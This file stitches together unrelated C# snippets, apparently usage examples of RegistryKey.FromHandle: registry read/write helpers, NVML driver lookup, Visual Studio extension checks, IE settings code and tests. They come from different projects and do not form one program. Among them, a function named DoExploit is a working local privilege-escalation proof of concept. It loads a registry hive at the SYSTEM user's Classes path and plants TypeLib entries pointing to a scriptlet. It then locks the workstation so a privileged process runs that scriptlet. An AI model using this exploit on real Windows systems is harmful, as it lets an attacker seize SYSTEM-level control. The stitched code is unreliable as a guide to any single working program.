/// <summary>
/// TODO: Add Comment
/// </summary>
/// <param name="handle"></param>
/// <param name="view"></param>
/// <returns></returns>
public IRegistryKey FromHandle(ISafeRegistryHandle handle, RegistryView view)
{
RegistryKey key = RegistryKey.FromHandle(handle.SafeRegistryHandleInstance, view);
if (null == key)
{
return(null);
}
else
{
return(new RegistryKeyWrap(key));
}
}
public static void EnsureNVMLCanBeLocated()
{
if (!RuntimeInformation.IsOSPlatform(OSPlatform.Windows))
{
// Assume linux, nothing to do.
// Linux is smart with LDConfig, Windows is monke with PATH look-ups
return;
}
CheckReturn(Functions.GetDeviceIdListSize(out var deviceListSize, VideoAdaptersClass, DeviceFlags));
var stringBuffer = new byte[deviceListSize];
CheckReturn(Functions.GetDeviceIdList(VideoAdaptersClass, stringBuffer, deviceListSize, DeviceFlags));
var nvmlLocation = "";
foreach (var deviceId in EnumerateDeviceStrings(stringBuffer))
{
CheckReturn(Functions.LocateDeviceNode(out var deviceNode, deviceId, LocateDeviceFlagNormal));
CheckReturn(Functions.OpenDeviceNodeRegistryKey(
deviceNode, AccessMaskQueryValue, CurrentHardwareProfile,
RegistryDispositionOpenExisting, out var registryKeyHandle,
RegistrySoftware
));
var registryKey = RegistryKey.FromHandle(new SafeRegistryHandle(registryKeyHandle, true));
var registryValue = registryKey.GetValue("OpenGLDriverName") as string[];
if (registryValue == null || registryValue.Length != 1)
{
continue;
}
var nvidiaDriverFilePath = registryValue[0];
var nvidiaDriverStore = Path.GetDirectoryName(nvidiaDriverFilePath);
if (File.Exists(Path.Combine(nvidiaDriverStore, "nvml.dll")))
{
nvmlLocation = nvidiaDriverStore;
break;
}
}
if (string.IsNullOrEmpty(nvmlLocation))
{
ThrowGenericError();
}
// TODO: Do I have to clean-up this handle?
Functions.AddDLLDirectory(nvmlLocation);
}
/// <summary>
/// 读取指定名称的注册表的值的数据
/// </summary>
/// <param name="hive">顶级注册表节点</param>
/// <param name="subkey">子项路径</param>
/// <param name="name">要寻找的值</param>
/// <param name="view">注册表视图</param>
/// <returns></returns>
public static string GetRegistryData(RegistryHive hive, string subkey, string name, RegistryView view = RegistryView.Default)
{
SafeRegistryHandle handle = new SafeRegistryHandle(GetHiveHandle(hive), true); //获得根节点的安全句柄
RegistryKey myKey = RegistryKey.FromHandle(handle, view).OpenSubKey(subkey, true); //获得要访问的键
string registData = "";
if (myKey != null)
{
registData = myKey.GetValue(name).ToString();
}
return(registData);
}
public RegistryKey GetRootRegistryKey(GroupPolicySection section)
{
IntPtr key;
var result = Instance.GetRegistryKey((uint)section, out key);
if (result != 0)
{
throw new Exception(string.Format("Unable to get section '{0}'", Enum.GetName(typeof(GroupPolicySection), section)));
}
var handle = new SafeRegistryHandle(key, true);
return(RegistryKey.FromHandle(handle, RegistryView.Default));
}
private void PrintVSExtensions(string instance)
{
var keyPath = $@"Software\Microsoft\VisualStudio\{instance}\ExtensionManager\EnabledExtensions";
using (var safeRegistryHandle = new SafeRegistryHandle(new IntPtr(hKey), true))
using (var appKey = RegistryKey.FromHandle(safeRegistryHandle))
using (var extensionsKey = appKey.OpenSubKey(keyPath, true))
{
var valueNames = extensionsKey.GetValueNames();
foreach (var name in valueNames)
{
var value = extensionsKey.GetValue(name);
}
}
}
static RegistryKey OpenSubKey(RegistryHive hive, string keyName, bool writeable = true)
{
try
{
SafeRegistryHandle handle = new SafeRegistryHandle(GetHiveHandle(hive), true);
RegistryView view = Environment.Is64BitOperatingSystem ? RegistryView.Registry64 : RegistryView.Registry32;
RegistryKey subkey = RegistryKey.FromHandle(handle, view).OpenSubKey(keyName, writeable);
return(subkey);
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
return(null);
}
}
public void NegativeTests()
{
// null handle
Assert.Throws <ArgumentNullException>(() => RegistryKey.FromHandle(handle: null, view: RegistryView.Default));
// invalid view
Assert.Throws <ArgumentException>(() => RegistryKey.FromHandle(TestRegistryKey.Handle, (RegistryView)(-1)));
Assert.Throws <ArgumentException>(() => RegistryKey.FromHandle(TestRegistryKey.Handle, (RegistryView)3));
// get handle of disposed RegistryKey
Assert.Throws <ObjectDisposedException>(() =>
{
TestRegistryKey.Dispose();
return(TestRegistryKey.Handle);
});
}
private static bool IsPluginInstalledIn2017(string version)
{
var existingKeyPath = I($@"Software\Microsoft\VisualStudio\{version}\ExtensionManager\EnabledExtensions");
var privateRegistryPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), I($@"Microsoft\VisualStudio\{version}\privateregistry.bin"));
var hKey = RegistryNativeMethods.RegLoadAppKey(privateRegistryPath);
using (var safeRegistryHandle = new SafeRegistryHandle(new IntPtr(hKey), true))
using (var appKey = RegistryKey.FromHandle(safeRegistryHandle))
using (var currentVersionKey = appKey.OpenSubKey(existingKeyPath))
{
var isPluginInstalled = currentVersionKey.GetValue(I($"{PluginGuid},{LatestPluginVersion}"));
return(isPluginInstalled != null);
}
}
static bool SetValueWithRegView(RegistryHive hive, string keyName, string valueName, object value, RegistryValueKind kind)
{
try
{
SafeRegistryHandle handle = new SafeRegistryHandle(GetHiveHandle(hive), true);
RegistryView view = Environment.Is64BitOperatingSystem ? RegistryView.Registry64 : RegistryView.Registry32;
RegistryKey subkey = RegistryKey.FromHandle(handle, view).OpenSubKey(keyName, true);
RegistryKey key = RegistryKey.FromHandle(subkey.Handle, view);
key.SetValue(valueName, value, kind);
return(true);
}
catch
{
return(false);
}
}
private static string ReadRegistry(bool is64, IntPtr root, string path, string valueName)
{
string result = null;
using (SafeRegistryHandle hkeyRootNativeHandle = new SafeRegistryHandle(root, false))
{
using (RegistryKey hkeyRoot = RegistryKey.FromHandle(hkeyRootNativeHandle, is64 ? RegistryView.Registry64 : RegistryView.Registry32))
{
using (RegistryKey key = hkeyRoot.OpenSubKey(path))
{
result = key?.GetValue(valueName) as string;
}
}
}
return(result);
}
/// <summary>
/// Sets an environment variable for the user.
/// </summary>
/// <param name="name"></param>
/// <param name="value"></param>
public void SetUsersEnvironmentVariables(Dictionary <string, string> envVariables)
{
if (!this.Created)
{
throw new InvalidOperationException("ProcessPrison has to be created first.");
}
if (envVariables.Keys.Any(x => x.Contains('=')))
{
throw new ArgumentException("A name of an environment variable contains the invalid '=' characther", "envVariables");
}
if (envVariables.Keys.Any(x => string.IsNullOrEmpty(x)))
{
throw new ArgumentException("A name of an environment variable is null or empty", "envVariables");
}
//if (envVariables.Values.Any(x => x == null))
//{
// throw new ArgumentException("A value of an environment variable is null", "envVariables");
//}
foreach (string key in envVariables.Keys)
{
this.myenvvars[key] = envVariables[key];
}
using (var impersonator = new UserImpersonator(this.WindowsUsername, this.WindowsDomain, this.WindowsPassword, true))
{
using (var registryHandle = impersonator.GetRegistryHandle())
{
using (var registry = RegistryKey.FromHandle(registryHandle))
{
using (var envRegKey = registry.OpenSubKey("Environment", true))
{
foreach (var env in envVariables)
{
var value = env.Value == null ? string.Empty : env.Value;
envRegKey.SetValue(env.Key, value, RegistryValueKind.String);
}
}
}
}
}
}
public static void SetData(string key, object value)
{
IntPtr phKey = new IntPtr();
var answer = IEGetWriteableHKCU(ref phKey);
RegistryKey writeable_registry = RegistryKey.FromHandle(
new Microsoft.Win32.SafeHandles.SafeRegistryHandle(phKey, true)
);
RegistryKey registryKey = writeable_registry.OpenSubKey(RegData, true);
if (registryKey == null)
{
registryKey = writeable_registry.CreateSubKey(RegData);
}
registryKey.SetValue(key, value);
writeable_registry.Close();
}
static object GetValueWithRegView(RegistryHive hive, string keyName, string valueName, RegistryView view = RegistryView.Registry32)
{
try
{
SafeRegistryHandle handle = new SafeRegistryHandle(GetHiveHandle(hive), true); //获得根节点的安全句柄
RegistryKey subkey = RegistryKey.FromHandle(handle, view).OpenSubKey(keyName); //获得要访问的键
RegistryKey key = RegistryKey.FromHandle(subkey.Handle, view); //根据键的句柄和视图获得要访问的键
return(key.GetValue(valueName)); //获得键下指定项的值
}
catch
{
return(string.Empty);
}
}
/// <summary>
/// 用于32位的程序设置64位的注册表
/// </summary>
/// <param name="hive">根级别的名称</param>
/// <param name="keyName">不包括根级别的名称</param>
/// <param name="valueName">项名称</param>
/// <param name="value">值</param>
/// <param name="kind">值类型</param>
/// <param name="view">注册表视图</param>
public static void SetValueWithRegView(RegistryHive hive, string keyName, string valueName, object value, RegistryValueKind kind, RegistryView view)
{
try
{
SafeRegistryHandle handle = new SafeRegistryHandle(GetHiveHandle(hive), true);
RegistryKey subkey = RegistryKey.FromHandle(handle, view).OpenSubKey(keyName, true);//需要写的权限,这里的true是关键。0227更新
RegistryKey key = RegistryKey.FromHandle(subkey.Handle, view);
key.SetValue(valueName, value, kind);
}
catch (Exception ex)
{
throw new Exception("写注册表失败," + ex.Message);
}
}
/// <summary>
/// Load the values from the registry
/// </summary>
private void Load()
{
if (this.isLoaded)
{
return;
}
IntPtr phKey = new IntPtr();
var answer = IEGetWriteableHKCU(ref phKey);
using (RegistryKey writeableRegistry = RegistryKey.FromHandle(new Microsoft.Win32.SafeHandles.SafeRegistryHandle(phKey, true)))
{
using (RegistryKey registryKey = writeableRegistry.OpenSubKey(DATA_REGISTRY_PATH, true))
{
if (registryKey == null)
{
this.enabled = false;
}
else
{
object registryValue;
registryValue = registryKey.GetValue(ENABLED_REGISTRY_KEY, null);
this.enabled = registryValue != null && registryValue.ToString() == TRUE_VALUE;
registryValue = registryKey.GetValue(USERPREF_REGISTRY_KEY, null);
this.userPref = registryValue != null?registryValue.ToString() : DEFAULT_USERPREF;
// lang
CultureInfo culture = CultureInfo.CurrentCulture;
this.lang = culture.Name.Substring(0, 2).ToUpper();
registryValue = registryKey.GetValue(BLACKLIST_REGISTRY_KEY, null);
this.blacklist.Clear();
if (registryValue != null)
{
this.blacklist.AddRange(registryValue.ToString().Split(','));
}
}
}
}
this.isLoaded = true;
}
internal static RegistryKey RegLoadAppKey(String hiveFile)
{
int hKey;
int rc = RegLoadAppKey(hiveFile, out hKey, RegSAM.AllAccess, REG_PROCESS_APPKEY, 0);
if (rc != 0)
{
if (rc == 0x20)
{
ErrorLog.Inst.LogError("Please Close All the instance of the Visual Studio");
}
else
{
ErrorLog.Inst.LogError("Unknown Error code : {0}", rc);
}
}
return(RegistryKey.FromHandle(new Microsoft.Win32.SafeHandles.SafeRegistryHandle(new IntPtr(hKey), true)));
}
///// <summary>
///// 向注册表中写数据
///// </summary>
///// <param name="name"></param>
///// <param name="tovalue"></param>
//public void SetRegistryData(RegistryKey root, string subkey, string name, string value)
//{
// RegistryKey aimdir = root.CreateSubKey(subkey);
// aimdir.SetValue(name, value);
//}
///// <summary>
///// 删除注册表中指定的注册表项
///// </summary>
///// <param name="name"></param>
//public void DeleteRegist(RegistryKey root, string subkey, string name)
//{
// string[] subkeyNames;
// RegistryKey myKey = root.OpenSubKey(subkey, true);
// subkeyNames = myKey.GetSubKeyNames();
// foreach (string aimKey in subkeyNames)
// {
// if (aimKey == name)
// myKey.DeleteSubKeyTree(name);
// }
//}
/// <summary>
/// 判断指定注册表项是否存在
/// </summary>
/// <param name="hive">顶级注册节点</param>
/// <param name="subkey">子项路径</param>
/// <param name="name">要寻找的项</param>
/// <param name="view">注册表视图</param>
/// <returns>存在返回true</returns>
public static bool IsRegistryExist(RegistryHive hive, string subkey, string name, RegistryView view = RegistryView.Default)
{
SafeRegistryHandle handle = new SafeRegistryHandle(GetHiveHandle(hive), true); //获得根节点的安全句柄
RegistryKey myKey = RegistryKey.FromHandle(handle, view).OpenSubKey(subkey); //获得要访问的键
if (myKey != null)
{
string[] subkeyNames = myKey.GetSubKeyNames();
foreach (string keyName in subkeyNames)
{
if (keyName == name)
{
return(true);
}
}
}
return(false);
}
static void DoExploit()
{
Console.WriteLine("{0}", Assembly.GetCallingAssembly().Location);
Tuple <EventWaitHandle, EventWaitHandle> events = GetEvents();
string cmdline = String.Format(@"""{0}"" {1}",
Assembly.GetCallingAssembly().Location.Replace('\\', '/'), Process.GetCurrentProcess().SessionId);
string scriptlet_path = Path.GetFullPath("dummy.sct");
File.WriteAllText(scriptlet_path, scriptlet_code.Replace("%CMDLINE%", cmdline), Encoding.ASCII);
Console.WriteLine("{0}", scriptlet_path);
string scriptlet_url = "script:" + new Uri(scriptlet_path).AbsoluteUri;
Console.WriteLine("{0}", scriptlet_url);
string reg_name = @"\Registry\User\S-1-5-18_Classes";
string path = @"\??\" + Path.GetFullPath("dummy.hiv");
File.Delete("dummy.hiv");
ObjectAttributes KeyName = new ObjectAttributes(reg_name);
ObjectAttributes FileName = new ObjectAttributes(path);
SafeRegistryHandle keyHandle;
StatusToNtException(NtLoadKeyEx(KeyName,
FileName, LoadKeyFlags.AppKey, IntPtr.Zero,
IntPtr.Zero, GenericAccessRights.GenericAll, out keyHandle, 0));
RegistryKey key = RegistryKey.FromHandle(keyHandle);
RegistryKey typelib_key = key.CreateSubKey("TypeLib").CreateSubKey("{D597DEED-5B9F-11D1-8DD2-00AA004ABD5E}").CreateSubKey("2.0").CreateSubKey("0");
typelib_key.CreateSubKey("win32").SetValue(null, scriptlet_url);
typelib_key.CreateSubKey("win64").SetValue(null, scriptlet_url);
Console.WriteLine("Handle: {0} - Key {1} - Path {2}", keyHandle.DangerousGetHandle(), reg_name, path);
Console.WriteLine("Lock screen and re-login.");
LockWorkStation();
events.Item1.WaitOne();
typelib_key.DeleteSubKey("win32");
typelib_key.DeleteSubKey("win64");
File.Delete(scriptlet_path);
typelib_key.Close();
key.Close();
events.Item2.Set();
}
private static void AccessHkcuRegistry(IntPtr hkcuHandle)
{
// Access registry HKCU
using (SafeRegistryHandle safeHandle = new SafeRegistryHandle(hkcuHandle, true))
{
using (RegistryKey tempUserHKCU = RegistryKey.FromHandle(safeHandle))
{
// Unum all sub keys under tempuser's HKCU
String[] keys = tempUserHKCU.GetSubKeyNames();
// Create a new sub key under tempuser's HKCU
using (RegistryKey tempKeyByWayne = tempUserHKCU.CreateSubKey("TempKeyByWayne"))
{
Console.WriteLine("TempKeyByWayne under TempUser's HKCU was created!");
// Ensure priviledge
//RegistrySecurity registrySecurity = new RegistrySecurity();
//RegistryAccessRule accessRule = new RegistryAccessRule(Environment.MachineName + "\\" + userName,
// RegistryRights.TakeOwnership,
// InheritanceFlags.ContainerInherit,
// PropagationFlags.None,
// AccessControlType.Allow);
//registrySecurity.SetAccessRule(accessRule);
//tempKeyByWayne.SetAccessControl(registrySecurity);
// Create a new String value under created TempKeyByWayne subkey
tempKeyByWayne.SetValue("StrType", "TempContent", RegistryValueKind.String);
// Read the value
using (RegistryKey regKey = tempUserHKCU.OpenSubKey("TempKeyByWayne"))
{
String valueContent = regKey.GetValue("StrType") as String;
Console.WriteLine("HKEY_CURRENT_USER\\TempKeyByWayne\\strTyle value: " + valueContent);
}
// Delete created TempKeyByWayne subkey
tempUserHKCU.DeleteSubKey("TempKeyByWayne");
Console.WriteLine("TempKeyByWayne under TempUser's HKCU was deleted!");
tempKeyByWayne.Close();
}
}
}
}
private string GetRegData()
{
string regData = "<ERROR>";
if (NativeMethods.ERROR_SUCCESS == NativeMethods.RegOpenCurrentUser(NativeMethods.KEY_ALL_ACCESS, out SafeRegistryHandle registryHandle))
{
try
{
using (registryHandle)
using (var key = RegistryKey.FromHandle(registryHandle))
using (var subKey = key.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Abc"))
{
regData = (string)subKey.GetValue("Name");
}
}
catch { }
}
return(regData);
}
private static void OperateReg(RegistryHive hive, string path, Dictionary <string, string[]> parameters, RegistryView view)
{
SafeRegistryHandle handle = new SafeRegistryHandle(GetHiveHandle(hive), true);
RegistryKey r = RegistryKey.FromHandle(handle, view).CreateSubKey(path, RegistryKeyPermissionCheck.ReadWriteSubTree);
//一般情况是使用如下代码:
//RegistryKey rk = Registry.LocalMachine.CreateSubKey(path);
if (parameters == null && parameters.Count <= 0)
{
return;
}
List <string> keys = parameters.Keys.ToList();
for (int i = 0; i < parameters.Count; i++)
{ //string to RegistryValueKind
RegistryValueKind rv = (RegistryValueKind)Enum.Parse(typeof(RegistryValueKind), parameters[keys[i]][1].ToString(), true);
r.SetValue(keys[i], parameters[keys[i]][0], rv);
LogHelper.WriteWarn("修改注册表成功");
}
}
internal CreateUserProcessResult(NtStatus status, ProcessCreateInfoData create_info, ProcessCreateState create_state)
{
ImageFile = null;
if (create_state == ProcessCreateState.FailOnSectionCreate)
{
ImageFile = new NtFile(new SafeKernelObjectHandle(create_info.FileHandle, true));
}
else if (create_state == ProcessCreateState.FailExeName)
{
IFEOKeyHandle = RegistryKey.FromHandle(new SafeRegistryHandle(create_info.IFEOKey, true));
}
Status = status;
CreateInfo = create_info;
CreateState = create_state;
Process = null;
Thread = null;
SectionHandle = null;
ImageInfo = new SectionImageInformation();
ClientId = new ClientId();
}
public WindowsUserSpecificSettings(string domain, string user, string pass)
{
WindowsUserSpecificSettings.AcquireTokenPriv("SeImpersonatePrivilege", 40U);
WindowsUserSpecificSettings.AcquireTokenPriv("SeBackupPrivilege", 40U);
WindowsUserSpecificSettings.AcquireTokenPriv("SeRestorePrivilege", 40U);
if (!WindowsUserSpecificSettings.LogonUser(user, domain, pass, WindowsUserSpecificSettings.LogonType.LOGON32_LOGON_NETWORK, WindowsUserSpecificSettings.LogonProvider.LOGON32_PROVIDER_DEFAULT, out this.m_UserToken))
{
throw new Win32Exception();
}
WindowsUserSpecificSettings.PROFILEINFO lpProfileInfo = new WindowsUserSpecificSettings.PROFILEINFO();
lpProfileInfo.dwFlags = 1;
lpProfileInfo.lpServerName = string.Empty;
lpProfileInfo.lpUserName = user;
lpProfileInfo.dwSize = Marshal.SizeOf((object)lpProfileInfo);
if (!WindowsUserSpecificSettings.LoadUserProfile(this.m_UserToken, ref lpProfileInfo))
{
throw new Win32Exception();
}
this.m_RegHandle = new SafeRegistryHandle(lpProfileInfo.hProfile, false);
this.m_RegHive = RegistryKey.FromHandle(this.m_RegHandle, RegistryView.Default);
}
private static string GetPortName(IntPtr hDevInfoSet, NativeMethods.SP_DEVINFO_DATA devInfoData)
{
var hRegKey = NativeMethods.SetupDiOpenDevRegKey(
hDevInfoSet,
ref devInfoData,
NativeMethods.DeviceInfoPropertyScope.DICS_FLAG_GLOBAL,
0,
NativeMethods.DeviceInfoRegistryKeyType.DIREG_DEV,
NativeMethods.RegistrySpecificAccessRights.KEY_QUERY_VALUE);
if (hRegKey == IntPtr.Zero)
{
return(string.Empty);
}
var safeHandle = new SafeRegistryHandle(hRegKey, true);
var key = RegistryKey.FromHandle(safeHandle);
return(key.GetValue(@"PortName") as string);
}
//============================================================
// <T>强转注册表信息操作64系统<T>
//
// @param type 类型
// @param sunKeyName 首节点
//============================================================
public static FRegisterPath Sync(ERegister type, string path)
{
// 构建对象
FRegisterPath registerPath = new FRegisterPath();
if (IsRunningOn64Bit)
{
RegistryKey localMachineKey = Registry.LocalMachine;
RegistryKey pathKey = localMachineKey.CreateSubKey(path);
registerPath.RootNode = pathKey;
return(registerPath);
}
// 存储路径
registerPath.Path = path;
int KEY_QUERY_VALUE = (0x0001);
int KEY_WOW64_64KEY = (0x0100);
int KEY_ALL_WOW64 = (KEY_QUERY_VALUE | KEY_WOW64_64KEY);
// 将Windows注册表主键名转化成为不带正负号的整形句柄(与平台是32或者64位有关)
UIntPtr hKey = TransferKeyName(type);
// 声明将要获取Key值的句柄
IntPtr pHKey = IntPtr.Zero;
// 关闭文件系统转向
IntPtr oldWOW64State = new IntPtr();
if (Wow64DisableWow64FsRedirection(ref oldWOW64State))
{
// 获得操作Key值的句柄
RegOpenKeyEx(hKey, path, 0, KEY_ALL_WOW64, out pHKey);
Microsoft.Win32.SafeHandles.SafeRegistryHandle safeHandle = new Microsoft.Win32.SafeHandles.SafeRegistryHandle(pHKey, true);
RegistryKey key = RegistryKey.FromHandle(safeHandle);
registerPath.RootNode = key;
// 关闭注册表转向(禁止特定项的注册表反射)
RegDisableReflectionKey(pHKey);
// 打开注册表转向(开启特定项的注册表反射)
RegEnableReflectionKey(pHKey);
}
// 打开文件系统转向
Wow64RevertWow64FsRedirection(oldWOW64State);
return(registerPath);
}
/// <summary>
/// Save the values to the registry
/// </summary>
private void Save()
{
this.Load();
// In IE 7,8,9,(desktop)10 tabs run in Protected Mode
// which prohibits writes to HKLM, HKCU.
// Must ask IE for "Writable" registry section pointer
// which will be something like HKU/S-1-7***/Software/AppDataLow/
// In "metro" IE 10 mode, tabs run in "Enhanced Protected Mode"
// where BHOs are not allowed to run, except in edge cases.
// see http://blogs.msdn.com/b/ieinternals/archive/2012/03/23/understanding-ie10-enhanced-protected-mode-network-security-addons-cookies-metro-desktop.aspx
IntPtr phKey = new IntPtr();
var answer = IEGetWriteableHKCU(ref phKey);
using (RegistryKey writeableRegistry = RegistryKey.FromHandle(new Microsoft.Win32.SafeHandles.SafeRegistryHandle(phKey, true)))
{
RegistryKey registryKey = writeableRegistry.OpenSubKey(DATA_REGISTRY_PATH, true);
try
{
if (registryKey == null)
{
registryKey = writeableRegistry.CreateSubKey(DATA_REGISTRY_PATH);
}
// enabled
registryKey.SetValue(ENABLED_REGISTRY_KEY, this.enabled ? TRUE_VALUE : FALSE_VALUE);
// userPref
registryKey.SetValue(USERPREF_REGISTRY_KEY, this.userPref);
// blacklist
registryKey.SetValue(BLACKLIST_REGISTRY_KEY, string.Join(",", this.blacklist));
}
finally
{
registryKey.Dispose();
}
}
}
public static List <KeyValuePair <string, string> > GetInstalledExtensions(string version, string instance)
{
var result = new List <KeyValuePair <string, string> >();
var keypath = $@"Software\Microsoft\VisualStudio\{GetVersionForRegistryKey(version, instance)}\ExtensionManager\EnabledExtensions";
// check the private hive exists and open it:
var hivefile = VS2017Info.VS2017AppData.GetPrivateRegFilename(version, instance);
if (!File.Exists(hivefile))
{
throw new VsInfoException($"{hivefile} does not exist.");
}
var hKey = RegistryNativeMethods.RegLoadAppKey(hivefile);
using (var safeRegistryHandle = new SafeRegistryHandle(new IntPtr(hKey), true))
using (var appKey = RegistryKey.FromHandle(safeRegistryHandle))
using (var extensionsKey = appKey.OpenSubKey(keypath, true))
{
if (extensionsKey == null)
{
throw new VsInfoException($"the key {keypath} does not exist in {hivefile}");
}
// get a list of key-value pairs - use the value names to get the values
result = extensionsKey == null ? result :
extensionsKey.GetValueNames().Select(x => new KeyValuePair <string, string>(x, extensionsKey.GetValue(x).ToString())).ToList();
var extensions = extensionsKey?.GetValueNames() ?? Enumerable.Empty <string>();
foreach (var key in extensions)
{
var value = extensionsKey.GetValue(key).ToString();
result.Add(new KeyValuePair <string, string>(key, value));
}
}
return(result);
}
static RegistryKey LoadKey(string path, bool read_only)
{
string reg_name = @"\Registry\A\" + Guid.NewGuid().ToString("B");
ObjectAttributes KeyName = new ObjectAttributes(reg_name);
ObjectAttributes FileName = new ObjectAttributes(@"\??\" + path);
SafeRegistryHandle keyHandle;
LoadKeyFlags flags = LoadKeyFlags.AppKey;
if (read_only)
{
flags |= LoadKeyFlags.ReadOnly;
}
int status = NtLoadKeyEx(KeyName,
FileName, flags, IntPtr.Zero,
IntPtr.Zero, GenericAccessRights.GenericRead, out keyHandle, 0);
if (status != 0)
{
return(null);
}
return(RegistryKey.FromHandle(keyHandle));
}
private static string LoadData(string key)
{
IntPtr phKey = new IntPtr();
var answer = IEGetWriteableHKCU(ref phKey);
RegistryKey writeable_registry = RegistryKey.FromHandle(
new Microsoft.Win32.SafeHandles.SafeRegistryHandle(phKey, true)
);
RegistryKey registryKey = writeable_registry.OpenSubKey(RegData, true);
string result;
if (registryKey == null)
{
result = "off";
}
else
{
result = (string)registryKey.GetValue(key);
}
writeable_registry.Close();
return(result);
}
private static void SaveOptions()
{
// In IE 7,8,9,(desktop)10 tabs run in Protected Mode
// which prohibits writes to HKLM, HKCU.
// Must ask IE for "Writable" registry section pointer
// which will be something like HKU/S-1-7***/Software/AppDataLow/
// In "metro" IE 10 mode, tabs run in "Enhanced Protected Mode"
// where BHOs are not allowed to run, except in edge cases.
// see http://blogs.msdn.com/b/ieinternals/archive/2012/03/23/understanding-ie10-enhanced-protected-mode-network-security-addons-cookies-metro-desktop.aspx
IntPtr phKey = new IntPtr();
var answer = IEGetWriteableHKCU(ref phKey);
RegistryKey writeable_registry = RegistryKey.FromHandle(
new Microsoft.Win32.SafeHandles.SafeRegistryHandle(phKey, true)
);
RegistryKey registryKey = writeable_registry.OpenSubKey(RegData, true);
if (registryKey == null)
{
registryKey = writeable_registry.CreateSubKey(RegData);
}
registryKey.SetValue("Data", TextToHighlight);
writeable_registry.Close();
}
